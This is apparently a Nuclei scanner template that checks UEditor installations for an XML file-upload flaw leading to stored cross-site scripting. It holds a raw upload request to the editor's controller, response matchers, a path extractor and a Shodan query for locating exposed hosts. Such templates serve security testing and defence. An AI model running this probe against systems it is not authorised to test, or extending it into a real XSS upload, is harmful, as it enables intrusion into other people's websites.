id: ueditor-xss info: name: ueditor - Cross Site Scripting author: pwnhxl severity: high description: | The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks. reference: - https://blog.csdn.net/weixin_50464560/article/details/124803185 - https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 verified: true shodan-query: title:"ueditor" tags: ueditor,xss variables: randstring: "{{to_lower(rand_base(16))}}" http: - raw: - | POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}} ------WebKitFormBoundary{{randstring}} Content-Disposition: form-data; name="upfile"; filename="test.xml" Content-Type: application/vnd.ms-excel ------WebKitFormBoundary{{randstring}}-- stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - 'state":"SUCCESS' - '.xml","title' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 extractors: - type: regex name: file_path part: body group: 1 regex: - 'url":"(.*)","title'